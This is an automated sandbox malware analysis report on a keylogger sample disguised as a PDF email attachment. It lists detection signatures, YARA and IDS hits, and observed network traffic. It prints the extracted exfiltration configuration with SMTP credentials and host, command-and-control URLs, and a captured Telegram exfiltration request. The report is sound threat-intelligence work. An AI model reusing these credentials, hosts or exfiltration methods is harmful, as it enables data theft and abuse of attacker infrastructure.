Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PK241200518-EMAIL RELEASE-pdf.exe

Overview

General Information

Sample name:PK241200518-EMAIL RELEASE-pdf.exe
Analysis ID:1577088
MD5:6897b3d43af4aca3376a79d7169746db
SHA1:fec918d4e90a3697a78931ac4dab8dc6da637afb
SHA256:23659bb599448db31b14bf56938cae2970929167fa41ad9d7e35cae65c1b4a64
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PK241200518-EMAIL RELEASE-pdf.exe (PID: 1264 cmdline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe" MD5: 6897B3D43AF4ACA3376A79D7169746DB)
    • RegSvcs.exe (PID: 5908 cmdline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dca0:$a1: get_encryptedPassword
          • 0x2e228:$a2: get_encryptedUsername
          • 0x2d913:$a3: get_timePasswordChanged
          • 0x2da2a:$a4: get_passwordField
          • 0x2dcb6:$a5: set_encryptedPassword
          • 0x309d2:$a6: get_passwords
          • 0x30d66:$a7: get_logins
          • 0x309be:$a8: GetOutlookPasswords
          • 0x30377:$a9: StartKeylogger
          • 0x30cbf:$a10: KeyLoggerEventArgs
          • 0x30417:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3947e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b21:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d7e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3975d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 15 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T00:30:29.869960+010028033053Unknown Traffic192.168.2.549727172.67.177.134443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T00:30:18.217728+010028032742Potentially Bad Traffic192.168.2.549704132.226.8.16980TCP
                2024-12-18T00:30:21.706195+010028032742Potentially Bad Traffic192.168.2.549704132.226.8.16980TCP
                2024-12-18T00:30:24.572922+010028032742Potentially Bad Traffic192.168.2.549704132.226.8.16980TCP
                2024-12-18T00:30:28.135272+010028032742Potentially Bad Traffic192.168.2.549704132.226.8.16980TCP
                2024-12-18T00:30:34.432138+010028032742Potentially Bad Traffic192.168.2.549733132.226.8.16980TCP
                2024-12-18T00:30:42.150983+010028032742Potentially Bad Traffic192.168.2.549744132.226.8.16980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: PK241200518-EMAIL RELEASE-pdf.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PK241200518-EMAIL RELEASE-pdf.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49719 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49791 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B445A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC6D1 FindFirstFileW,FindClose,0_2_007BC6D1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC75C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BEF95
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF0F2
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF3F3
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B37EF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3B12
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBCBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_010EF4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_010EFB03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_010EFCE3

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 172.67.177.134:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49719 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007C22EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 23:30:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBeq
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49791 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007C4164
